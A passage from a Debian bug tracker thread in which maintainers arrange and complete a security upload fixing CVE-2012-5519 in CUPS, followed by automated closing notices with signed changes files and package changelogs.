> > case there are more, it's better to include the relevant bits at first.
> 
> Sure! My intent was just to make the 1.4.4 backport of the patch public, not 
> necessarily to have it released immediately.
> 
> That said, who triggers the re-examination of the patch for security release? 

AFAICS can there haven't been any regressions, can we should go ahead with
the update now.

Didier, can you upload to security-master, please?

Cheers,
        Moritz



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Fri, 28 Dec 2012 17:42:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Fri, 28 Dec 2012 17:42:03 GMT) Full text and rfc822 format available.

Message #226 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Moritz Mühlenhoff <jmm@inutil.org>, 692791@bugs.debian.org
Cc: "Yves-Alexis Perez" <corsac@debian.org>, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Fri, 28 Dec 2012 18:40:29 +0100
Le jeudi, 27 décembre 2012 20.43:12, Moritz Mühlenhoff a écrit :
> AFAICS can there haven't been any regressions, can we should go ahead with
> the update now.

EPARSE

> Didier, can you upload to security-master, please?

The release targetted to Wheezy has just been reviewed in #695423, I'll upload 
the updated fix to security-master in the next few hours.

Cheers,

OdyX



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Fri, 28 Dec 2012 18:42:14 GMT) Full text and rfc822 format available.

Acknowledgement sent to Moritz Mühlenhoff <jmm@inutil.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Fri, 28 Dec 2012 18:42:14 GMT) Full text and rfc822 format available.

Message #231 received at 692791@bugs.debian.org (full text, mbox):

From: Moritz Mühlenhoff <jmm@inutil.org>
To: Didier 'OdyX' Raboud <odyx@debian.org>
Cc: Moritz Mühlenhoff <jmm@inutil.org>, 692791@bugs.debian.org, Yves-Alexis Perez <corsac@debian.org>, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Fri, 28 Dec 2012 19:39:33 +0100
On Fri, Dec 28, 2012 at 06:40:29PM +0100, Didier 'OdyX' Raboud wrote:
> Le jeudi, 27 décembre 2012 20.43:12, Moritz Mühlenhoff a écrit :
> > AFAICS can there haven't been any regressions, can we should go ahead with
> > the update now.
> 
> EPARSE

I meant: No regressions in sid -> We can proceed with stable

Cheers,
        Moritz



Information forwarded to debian-bugs-dist@lists.debian.org, Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>:
Bug#692791; Package cups. (Sat, 29 Dec 2012 13:51:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to "Didier 'OdyX' Raboud" <odyx@debian.org>:
Extra info received and forwarded to list. Copy sent to Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>. (Sat, 29 Dec 2012 13:51:03 GMT) Full text and rfc822 format available.

Message #236 received at 692791@bugs.debian.org (full text, mbox):

From: "Didier 'OdyX' Raboud" <odyx@debian.org>
To: Moritz Mühlenhoff <jmm@inutil.org>
Cc: 692791@bugs.debian.org, "Yves-Alexis Perez" <corsac@debian.org>, team@security.debian.org
Subject: Re: Bug#692791: #692791: CVE-2012-5519 Security update towards Squeeze ?
Date: Sat, 29 Dec 2012 14:50:55 +0100
[Message part 1 (text/plain, inline)]
Le vendredi, 28 décembre 2012 19.39:33, Moritz Mühlenhoff a écrit :
> On Fri, Dec 28, 2012 at 06:40:29PM +0100, Didier 'OdyX' Raboud wrote:
> > Le jeudi, 27 décembre 2012 20.43:12, Moritz Mühlenhoff a écrit :
> > > AFAICS can there haven't been any regressions, can we should go ahead
> > > with the update now.
> > 
> > EPARSE
> 
> I meant: No regressions in sid -> We can proceed with stable

Uploaded to unembargoed as 1.4.4-7+squeeze2.

The code is on http://anonscm.debian.org/gitweb/?p=pkg-
cups/cups.git;a=shortlog;h=refs/heads/master-squeeze

Cheers,

OdyX
[signature.asc (application/pgp-signature, inline)]

Reply sent to Didier Raboud <odyx@debian.org>:
You have taken responsibility. (Sat, 12 Jan 2013 15:48:22 GMT) Full text and rfc822 format available.

Notification sent to Jörg Ludwig <joerg.ludwig@iserv.eu>:
Bug acknowledged by developer. (Sat, 12 Jan 2013 15:48:22 GMT) Full text and rfc822 format available.

Message #241 received at 692791-close@bugs.debian.org (full text, mbox):

From: Didier Raboud <odyx@debian.org>
To: 692791-close@bugs.debian.org
Subject: Bug#692791: fixed in cups 1.4.4-7+squeeze2
Date: Sat, 12 Jan 2013 15:47:22 +0000
Source: cups
Source-Version: 1.4.4-7+squeeze2

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <odyx@debian.org> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 29 Dec 2012 12:33:27 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsdriver1 libcupsmime1 libcupsppdc1 cups cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev libcupsdriver1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common cups-ppdc cups-dbg cupsddk
Architecture: source all amd64
Version: 1.4.4-7+squeeze2
Distribution: squeeze-security
Urgency: high
Maintainer: Debian CUPS Maintainers <pkg-cups-devel@lists.alioth.debian.org>
Changed-By: Didier Raboud <odyx@debian.org>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 cupsddk    - Common UNIX Printing System (transitional package)
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI libra
 libcupsdriver1 - Common UNIX Printing System(tm) - Driver library
 libcupsdriver1-dev - Common UNIX Printing System(tm) - Development files driver librar
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD library
Closes: 692791
Changes: 
 cups (1.4.4-7+squeeze2) stable-security; urgency=high
 .
   * Backport upstream configuration files split:
     - Add split-configuration-files-STR4223.dpatch
     - Install the new cups-files.conf
     Fixes: CVE-2012-5519 (Closes: #692791)
   * Make cupsd.conf a non-conffile, as it is managed by cups itself.
     - On new installs, set it up from cupsd.conf.default.
     - On upgrades, move it away in preinst and move it back in postinst.
     - On aborted upgrades, move the file back in place.
     - On purge, delete it too.
   * Document changes in cups.NEWS.
Checksums-Sha1: 
 6b922165e26726832978ec4ae2eb406e1f35f3b9 2583 cups_1.4.4-7+squeeze2.dsc
 c6afc5d96747e74b9755d2cce3401638700ced8f 521545 cups_1.4.4-7+squeeze2.diff.gz
 544bc6b73ca305a50a18da18fe96e049e11f448f 1344298 cups-common_1.4.4-7+squeeze2_all.deb
 39d3bc308725571a67343438b94cb64514686b6d 77024 cupsddk_1.4.4-7+squeeze2_all.deb
 d04708b15eacd018ed5dcb50508c77890d05b446 234040 libcups2_1.4.4-7+squeeze2_amd64.deb
 f35568b66006418c793498a786ccb82c79ccaf06 125394 libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 a0537d0648438ddbdbb134264dadb499a6ce1788 105338 libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 2cd2b644b8aadbb237da3701c873f77948d409b3 93916 libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 5cd392e71dbace2554fc3e21ba4825707be3fd62 87686 libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 51201857fc49b8de27a14e70a273861e2e4ccc92 132420 libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 ec37d72fdb6123c8b6186570b9390fbff49f5dc3 2059088 cups_1.4.4-7+squeeze2_amd64.deb
 6e7e29037b800da958e09e57909d22c051881c26 139494 cups-client_1.4.4-7+squeeze2_amd64.deb
 8dbd223ae56419ac14e8c7c685ee62375c261185 294934 libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 53072d6018f62e63c09cec272492881488a1c004 61186 libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 ab9eae265141d4533127d1f9ba164e697ca9ae6f 110938 libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 fbe450cb6d17611633c443671cffb0da8a90ba28 96886 libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 066e39be34daba32ce45597f6d2761768827b62a 88420 libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 575d2e20625d4fba7cf395c2ffc2413011ebc801 149904 libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 3a59df460e1baebf75ab144cfb98c9e576288601 46532 cups-bsd_1.4.4-7+squeeze2_amd64.deb
 93b7ba14959112306d843230a644e656c91678bd 106586 cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 e996d7ff3d2ed820208b7f5491a97a2447c536b4 97122 cups-dbg_1.4.4-7+squeeze2_amd64.deb
Checksums-Sha256: 
 bd4021ac5f0c673277ed769c11630b7fa8563c4f411b5b80a354f0fc56aea30b 2583 cups_1.4.4-7+squeeze2.dsc
 4dd13c53dc7793221f5fb2ca57f0637de43d99a277e1e5a753362d4be3b00517 521545 cups_1.4.4-7+squeeze2.diff.gz
 9dd540769a216eb644848671e5f59438edf8d560db77db86f0866a8e5ff8616e 1344298 cups-common_1.4.4-7+squeeze2_all.deb
 ba706ae5fff98ba8dbc88f88b87598fc8e77e7175f44b0b52aab4a45d0c36da5 77024 cupsddk_1.4.4-7+squeeze2_all.deb
 6852a1c2460602bb57ccba8d808bd91f1fae038a9228cddb2ad1d7e823b64234 234040 libcups2_1.4.4-7+squeeze2_amd64.deb
 b95fbd4cf16b5451610e52696d3f4da9ce1d1707e021eb2a9663ce560df63ea4 125394 libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 e246eb0d184cb9e409394d1bbccd53f55018ba646b986a138f749849e187580a 105338 libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 61bb064df5977a03519c6f357481581f75beab42dcdfddf362c4ef3255fcdcb0 93916 libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 ab3b73adcb85fea8d955acbb62e7c718d33e777ff76d10527698e5a349e12fc3 87686 libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 9e91ab36c25fdc89e46ce27bec9793b4c2e86102260301ed8f8b7cc4c46f6841 132420 libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 378a499c0358b880ca165e420b49976ceea8a20e11c86e7bdbd40cc8b03648e4 2059088 cups_1.4.4-7+squeeze2_amd64.deb
 7ae10eb6984a084048983216475f1b1fd91104171d332526165d750081ab14bd 139494 cups-client_1.4.4-7+squeeze2_amd64.deb
 13a3487740ca366d06d2ddc7f6608646b96b74b2d7f3e19c759eae678ee5077e 294934 libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 2d892b4d8ef6b2f50fe8decf981088695ba770f1db88bdf9d9487aa62c07106c 61186 libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 a2bfa856774f046ff31c41889f7b47f7efd46fb75f101df21dfd7598c0e60b26 110938 libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 1b48cbe741863161551eca74cdc73e2b4705f5a67a2d14c5ce9a915257d8d174 96886 libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 c5549b011a5e7b7d1e94761b9f3caee366cc183ece80d23f9ff97cec3c54a807 88420 libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 d33a6d26d1697c0485298a2c20ec6c33f1b25017c743e446e2305a3fd3cf4bd5 149904 libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 8e9d635f603f0c5757ccd65cf4ff2fad6ea6ceadcecc32fc8ada048560c3b43a 46532 cups-bsd_1.4.4-7+squeeze2_amd64.deb
 120ee31ed37383e73f6b570986a54995da197812daff044734293b0fd27f2d49 106586 cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 0f00eb3ddb41ae9c3aa01704d0ec09f892404139e85e0e48abe0535572ce76d6 97122 cups-dbg_1.4.4-7+squeeze2_amd64.deb
Files: 
 81b09faac4dfeb46339f1ad31a8847d0 2583 net optional cups_1.4.4-7+squeeze2.dsc
 2a2894ea965d229e89a2b4e5d34bbcf1 521545 net optional cups_1.4.4-7+squeeze2.diff.gz
 598ebbd39e6267e7f9e3e5859882bf25 1344298 net optional cups-common_1.4.4-7+squeeze2_all.deb
 feb2e8342bfdb4314ccce1b7ee8d7c17 77024 oldlibs extra cupsddk_1.4.4-7+squeeze2_all.deb
 83e4398558baf341f309ffd7dc8b804f 234040 libs optional libcups2_1.4.4-7+squeeze2_amd64.deb
 0aa9a4b39e8e37175260190dbb6abd4f 125394 libs optional libcupsimage2_1.4.4-7+squeeze2_amd64.deb
 3fc0c95452a701519dfb0cfe452e8e57 105338 libs optional libcupscgi1_1.4.4-7+squeeze2_amd64.deb
 a27420bb5c58f54d0dbb377bb5d03cd2 93916 libs optional libcupsdriver1_1.4.4-7+squeeze2_amd64.deb
 f19f88df88bb245ac80559977e51123a 87686 libs optional libcupsmime1_1.4.4-7+squeeze2_amd64.deb
 e8071d13d22a496077b5e8eb04241184 132420 libs optional libcupsppdc1_1.4.4-7+squeeze2_amd64.deb
 ca37d3ff9ba77b72d6f3ed8ca9a8b5c9 2059088 net optional cups_1.4.4-7+squeeze2_amd64.deb
 541219e6b0a7a47493a9a1add3e15625 139494 net optional cups-client_1.4.4-7+squeeze2_amd64.deb
 6ec993d5884c92c0cd5e3781dcc47000 294934 libdevel optional libcups2-dev_1.4.4-7+squeeze2_amd64.deb
 e3a6bfc0c57718804b09c6f91f7e7dcf 61186 libdevel optional libcupsimage2-dev_1.4.4-7+squeeze2_amd64.deb
 48fff9a16a074a498d7059e529dd264d 110938 libdevel optional libcupscgi1-dev_1.4.4-7+squeeze2_amd64.deb
 f28e008377d699a4616ed5b661c6cbac 96886 libdevel optional libcupsdriver1-dev_1.4.4-7+squeeze2_amd64.deb
 4c0cbf5e55946aedb22089e9a8d23886 88420 libdevel optional libcupsmime1-dev_1.4.4-7+squeeze2_amd64.deb
 4d657fbf340928e5f4d6c5cb4ab35bba 149904 libdevel optional libcupsppdc1-dev_1.4.4-7+squeeze2_amd64.deb
 6208ace17e754fbd33ed89215a3b6da7 46532 net extra cups-bsd_1.4.4-7+squeeze2_amd64.deb
 2a4bd6619eb7bccfaa9975e2004dc3d5 106586 net optional cups-ppdc_1.4.4-7+squeeze2_amd64.deb
 0637a0175f63391a7f88945733438d0e 97122 debug extra cups-dbg_1.4.4-7+squeeze2_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iQGcBAEBCAAGBQJQ3vQ4AAoJEIvPpx7KFjRVk3EL/jFgtEvLtIttC0UsIfIoHl2L
munL8/yeawVk5tbYmKgQRAXpzPe46+9AxGB9hNDxc6Z/i4D7g0AHLRUPgpJv1S2p
39ijm85ar6NZ5In5149WxVbdxo4T1a4d5HI4mRnrOv3R9NLS/3YWRw/QDsOvCP90
smKYyhR7xhdek4g2nyrpXE/51+R0hyRyUXa6qNVNevAuSOh1AVVEgZcBOKthHFme
ZP8qYaEKCpNXfIdcgPcv6hFgrAYZnonHtQlrUsn71O6NbTzBIrPjtZBDPkJ3Pf9a
72JGHwGH+L0464uCrjHQp22M3AfTbv0yqPDlV5XyTYYf5g232VmM74naIu9syXSl
S+YjSPe5m74r2XWU+cOVY0gwNi4TkAiGARZy/GxtCBoJLp9SBxJTV7rx4CQsdR1m
BIXabrBsWo7WdRWB+w4xJSq0jQ0KUA89Z/WsfwcNZI2Ys+aw9DiClz0AZCzv36G0
8BAah9gVn00Ez+jiy4GmMSUwoOihdvfhxKhCUNNDXg==
=JxfV
-----END PGP SIGNATURE-----




Reply sent to Didier Raboud <odyx@debian.org>:
You have taken responsibility. (Sat, 12 Jan 2013 16:03:22 GMT) Full text and rfc822 format available.

Notification sent to Jörg Ludwig <joerg.ludwig@iserv.eu>:
Bug acknowledged by developer. (Sat, 12 Jan 2013 16:03:22 GMT) Full text and rfc822 format available.

Message #246 received at 692791-close@bugs.debian.org (full text, mbox):

From: Didier Raboud <odyx@debian.org>
To: 692791-close@bugs.debian.org
Subject: Bug#692791: fixed in cups 1.6.1-1
Date: Sat, 12 Jan 2013 16:00:09 +0000
Source: cups
Source-Version: 1.6.1-1

We believe that the bug you reported is fixed in the latest version of
cups, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 692791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Didier Raboud <odyx@debian.org> (supplier of updated cups package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 12 Jan 2013 09:41:00 +0100
Source: cups
Binary: libcups2 libcupsimage2 libcupscgi1 libcupsmime1 libcupsppdc1 cups cups-daemon cups-client libcups2-dev libcupsimage2-dev libcupscgi1-dev libcupsmime1-dev libcupsppdc1-dev cups-bsd cups-common cups-ppdc cups-dbg
Architecture: source amd64 all
Version: 1.6.1-1
Distribution: experimental
Urgency: low
Maintainer: Debian Printing Team <debian-printing@lists.debian.org>
Changed-By: Didier Raboud <odyx@debian.org>
Description: 
 cups       - Common UNIX Printing System(tm) - server
 cups-bsd   - Common UNIX Printing System(tm) - BSD commands
 cups-client - Common UNIX Printing System(tm) - client programs (SysV)
 cups-common - Common UNIX Printing System(tm) - common files
 cups-daemon - Common UNIX Printing System(tm) - server
 cups-dbg   - Common UNIX Printing System(tm) - debugging symbols
 cups-ppdc  - Common UNIX Printing System(tm) - PPD manipulation utilities
 libcups2   - Common UNIX Printing System(tm) - Core library
 libcups2-dev - Common UNIX Printing System(tm) - Development files CUPS library
 libcupscgi1 - Common UNIX Printing System(tm) - CGI library
 libcupscgi1-dev - Common UNIX Printing System(tm) - Development files for CGI libra
 libcupsimage2 - Common UNIX Printing System(tm) - Raster image library
 libcupsimage2-dev - Common UNIX Printing System(tm) - Development files CUPS image li
 libcupsmime1 - Common UNIX Printing System(tm) - MIME library
 libcupsmime1-dev - Common UNIX Printing System(tm) - Development files MIME library
 libcupsppdc1 - Common UNIX Printing System(tm) - PPD manipulation library
 libcupsppdc1-dev - Common UNIX Printing System(tm) - Development files PPD library
Closes: 508941 645442 670042 670224 683754 690522 692791
Changes: 
 cups (1.6.1-1) experimental; urgency=low
 .
   * New upstream release
      - Avahi-based Bonjour/DNS-SD/mDNS support
      - ICC-based color management with colord
      - IPP-Everywhere support
      - Moved filters not needed by Mac OS to cups-filters project at
        OpenPrinting.
      - Moved API of libcupsdrivers (driver.h) and of part of libcupsimage
        (image.h) to cups-filters.
      - cups-polld removed
      - Fixes: LP: #904093, LP: #1027804, Closes: #690522
 .
   [ Marc Deslauriers ]
   * debian/local/apport-hook.py: Also attach AppArmor information and logs.
 .
   [ Jamie Strandboge ]
   * debian/local/apparmor-profile: deny capability block_suspend. It is noisy
     and doesn't seem to actually be needed. This can be revisited if it turns
     out it is needed. (LP: #1031583)
 .
   [ Till Kamppeter ]
   * debian/patches/ipp-backend-cups-1.5.4-fixes.patch,
     debian/patches/install-sh-remove-bashism.patch,
     debian/patches/usb-backend-busy-loop-fix.patch,
     debian/patches/usb-backend-detach-usblp-earlier-crash-guards.patch,
     debian/patches/usb-backend-initialize-usblp-attached-state.patch,
     debian/patches/usb-backend-further-enhancements.patch,
     debian/patches/snmp-dont-stop-without-ipv6.patch,
     debian/patches/cups-avahi.patch,
     debian/patches/colord-support.patch: Removed, included upstream.
   * debian/patches/dnssd-reg-array-linear-search.patch: Removed, not applicable
     any more.
   * debian/patches/pidfile.patch,
     debian/patches/airprint-support.patch,
     debian/patches/no-conffile-timestamp.patch,
     debian/patches/drop_unnecessary_dependencies.patch,
     debian/patches/configure-default-browse-protocols.patch
     debian/patches/add-ipp-backend-of-cups-1.4.patch
     debian/patches/printer-filtering.patch,
     debian/patches/show-compile-command-lines.patch,
     debian/patches/pstops-based-workflow-only-for-printing-ps-on-a-ps
     -printer.patch,
     debian/patches/tests-ignore-usb-crash.patch: Manually regenerated to adapt
     to upstream changes.
   * debian/patches/debian/patches/ppd-poll-with-client-conf.patch,
     debian/patches/manpage-translations.patch,
     debian/patches/rootbackends-worldreadable.patch,
     debian/patches/reactivate_recommended_driver.patch,
     debian/patches/read-embedded-options-from-incoming-postscript-and-add-to-ipp
     -attrs.patch,
     debian/patches/do-not-broadcast-with-hostnames.patch,
     debian/patches/confdirperms.patch,
     debian/patches/log-debug-history-nearly-unlimited.patch,
     debian/patches/tests-ignore-warnings.patch,
     debian/patches/tests-ignore-usb-crash.patch,
     debian/patches/tests-slow-lpstat.patch,
     debian/patches/tests-fix-ppdLocalize-on-unclean-env.patch,
     debian/patches/pidfile.patch: Refreshed with quilt.
   * debian/patches/airprint-support.patch: Fixes in the conditionals to make
     AirPrint work with the new upstream Avahi support, support for iOS 6
     clients (LP: #1054495).
   * debian/patches/network-backends-snmp-queries-optional.patch: SNMP queries
     by network backends can get suppressed now by adding "?snmp=false" to the
     end of the URI. SNMP queries to Bonjour-shared CUPS queue will get
     suppressed by default.
   * debian/patches/usb-backend-reset-after-job-only-for-specific-devices.patch:
     Let the USB backend only send a clean-up reset after the job if it is
     really needed (LP: #1032456), force-uni-directional access for Canon
     Pixma iP4200 (CUPS STR #4155) and iP4300 (LP: #1032385).
   * debian/patches/usb-backend-more-quirk-rules.patch: Added more quirk rules
     which are not yet committed upstream: Canon MP500 (LP: #1032456), MP510
     (LP: #1050009), MP550 (CUPS STR #4155), MP560 (CUPS STR #4155), Brother
     HL-1430 (LP: #1038695), Oki Okipage 14ex (LP: #872483), Oki B410d
     (LP: #872483), all Zebra printers (LP: #1001028).
   * debian/patches/cupsd-conf-remove-obsolete-browse-directives.patch:
     Removed obsolete "BrowseOrder" and "BrowseAllow" lines from cupsd.conf.
   * debian/patches/get-ppd-file-for-statically-configured-bonjour-shared
     -queues.patch:
     Applications could not get the PPD file for statically-configured Bonjour-
     shared print queues (CUPS STR #4159)
   * debian/patches/get-ppd-file-for-statically-configured-ipp-shared
     -queues.patch:
     Applications could not get the PPD file for statically-configured IPP-
     shared print queues (CUPS STR #4178)
   * debian/patches/printers-c-recognize-remote-cups-queue-via-dnssd-uri.patch,
     Treat raw queues pointing to a CUPS server as remote queues (using PPD on
     server) also if they have a "dnssd://..." URI.
   * debian/patches/avahi-not-considered-at-some-dnssd-conditionals.patch: At
     some points Avahi was not considered in conditionals for DNS-SD. This
     broke most of the printer sharing functionality.
   * debian/patches/prevent-crash-due-to-null-host-name-or-fqdn-from-avahi.patch:
     Prevent crash due to NULL host name or FQDN from Avahi (CUPS STR #4183,
     LP: #1046982, LP: #1034045).
   * debian/patches/fix-crash-on-shutdown-caused-by-broken-avahi-config.patch:
     Fix crash on shutdown caused by broken Avahi config (CUPS STR #4192,
     LP: #1036974).
   * debian/patches/fix-another-spot-where-avahi-crashes-cupsd-because-it-does
     -not-handle-null-values-from-its-own-apis.patch:
     Fix another spot where Avahi crashes cupsd because it does not handle NULL
     values returned by its own APIs (CUPS STR #4200, LP: #1041013).
   * debian/patches/cupsd-no-crash-on-avahi-threaded-poll-shutdown.patch:
     Fixed crash which sometimes happens on shutdown of the CUPS daemom,
     caused by a wrong shutdown sequence for shutting down the Avahi threaded
     poll (CUPS STR #4213, CUPS STR #4180, LP: #1034045).
   * debian/patches/filter-out-all-control-characters-from-the-1284-device
     -id.patch:
     Do not only filter newline characters out of device IDs but any
     non-printable character (CUPS STR #4124).
   * debian/patches/ipp-backend-did-not-specify-the-compression-used.patch:
     The IPP backend did not specify the compression used (CUPS STR #4181).
   * debian/patches/ipp-backend-did-not-send-cancel-request-to-printers-when-a
     -job-was-canceled-and-printer-did-not-support-create-job.patch:
     The IPP backend did not send a cancel request to printers when a job was
     canceled and the printer did not support Create-Job. This is to improve the
     "ipp" backend as much as possible to reduce the ned of the "ipp14" backend
     ("ipp" backend of CUPS 1.4.x added to the Debian/Ubuntu package as fallback
     in case of regressions of the current "ipp" backend).
   * debian/patches/work-around-some-broken-ipp-printers.patch: Work around
     some broken IPP printers (CUPS STR #4190). Also catch late authentication
     issues so the backend doesn't just spin on a print request that will never
     succeed.
   * debian/patches/ipp-backend-abort-the-outer-loop-if-we-get-a-failure-from
     -send-document.patch,
     debian/patches/ipp-backend-could-get-stuck-in-an-endless-loop-on-certain
     -network-errors.patch:
     Prevent IPP backend from falling into an infinite loop in certain
     situations (CUPS STR #4194).
   * debian/patches/fix-make-check.patch: Fix "make check".
   * debian/patches/ubuntu/ubuntu-disable-browsing.patch: Updated.
   * debian/cups.install: Removed all references to the discontinued cups-polld.
   * debian/rules: Removed lines for deletion of filters, fonts and glyphs which
     have moved to cups-filters and also the line for commenting out conversion
     rules.
   * debian/rules, debian/cups.install, debian/cups-common.install: Do not
     install fonts and charsets, there are none any more in CUPS.
   * debian/control, debian/libcupsdriver1-dev.install,
     debian/libcupsdriver1.symbols, debian/libcupsdriver1.install:
     libcupsdriver.so got moved to cups-filters as part of libcupsfilters.so.
   * debian/libcupsimage2-dev.install: image.h removed, this API has moved to
     cups-filters.
   * debian/rules: Removed "--with-remote_protocols='CUPS dnssd'" from the
     ./configure command line and removed the "CUPS" from
     "--with-local_protocols='CUPS dnssd'". These settings are not supported
     any more in CUPS 1.6.x.
   * debian/rules, debian/libcups2-dev.examples: Removed references to scripting/
     this subdirectory does not exist any more in CUPS 1.6.x.
   * debian/libcups2.symbols, debian/libcupsimage2.symbols: Refreshed using the
     diff of the dpkg-gensymbols output during build.
   * debian/cups.postinst: Clean /etc/cups/cupsd.conf from all keywords and
     settings which got obsolete with the dropping CUPS Broadcasting/Browsing
     in CUPS 1.6.x: BrowsePoll, BrowseAllow, BrowseDeny, BrowseOrder, and
     BrowseRemoteProtocols lines get removed and the "cups" argument gets
     removed from the BrowseLocalProtocols line (LP: #1052897).
   * Split the "cups" binary package into "cups" and "cups-daemon".
     Installation of "cups-daemon" without "cups" gives a CUPS
     environment for raw queues only, especially as a client-only mode
     with queues pointing to remote printers set up automatically with
     cups-browsed from cups-filters. This environment gives basic
     printing support on low-footprint mobile systems, like Ubuntu for
     Android.
 .
   [ Martin Pitt ]
   * manpage-translations.patch: Update German manpage translations, thanks
     Helge Kreutzmann! (Closes: #670042)
   * manpage-translations.patch: Update French manpage translations, thanks
     Julien Patriarca! (Closes: #670224)
   * debian/README.Debian: Explain how to enable cups-lpd, thanks Vincent
     McIntyre. (Closes: #508941)
 .
   [ Didier Raboud ]
   * Make sure unowned obsolete backends are removed on configure.
     (Closes: #683754)
   * Update all debconf translations to cope with the ipp14 addition and
     parallel and serial removals.
   * Add patch to force C locale when testing the (non-)localized PPD
     content fetch.
   * Re-order patches to put the tests-fixing ones earlier.
   * Rename tests-slow-lpstat.patch to
     tests-wait-on-unfinished-jobs-everytime.patch : wait on remaining
     jobs before each test. This fix the too slow architectures' FTBFS.
   * When modprobe'ing usblp, respect the blacklist. Thanks to Julien
     Cristau for noticing!
   * Use cups-filters' filters, type declarations, conversions, libraries
     and banners in the tests. Add cups-filters' and libcupsfilters1-dev
     Build-Depends, with a version bigger than 1.0.24-3~ (to pull bc in).
   * Convert packaging repository to Git, change VCS-* fields accordingly,
     update debian/README.source.
   * Merge releases targeted at wheezy.
   * Refresh all patches using "quilt -p ab".
   * Uploaders:
     - Add myself.
     - Remove Kenshi Muto <kmuto@debian.org> with his agreement and with
       great thanks for his past work!
   * Put under Debian Printing Team umbrella.
   * Drop cupsddk transitional package, was transitional in Squeeze.
   * Make libcupsimage2 depend on libcupsfilters1 as functions (and
     exported symbols) moved there.
   * Enable manpage translations by installing them from debian/rules
     when they exist. This allows the build to be more robust against
     non-complete translations.
   * Disable pstops-based-workflow-only-for-printing-ps-on-a-ps-printer.patch,
     as it breaks the build tests in 1.6.1. Re-opens #593338.
   * Remove the obsolete etc/cups/pdftops.conf and etc/cups/acroread.conf
     using cups.maintscript. (Closes: #645442)
   * Drop redundant dpkg-maintscript-helper snippets in cups maintainer
     scripts.
   * Drop redundant Priority and Section values in debian/control.
   * Convert packaging to debhelper 9; drop cdbs Build-Depends.
   * Drop all relationships to libcupsys2{,-dev} and cupsddk-drivers as
     they got removed before Lenny.
   * In tests-ignore-usb-crash.patch, also ignore "[cups-deviced] PID *
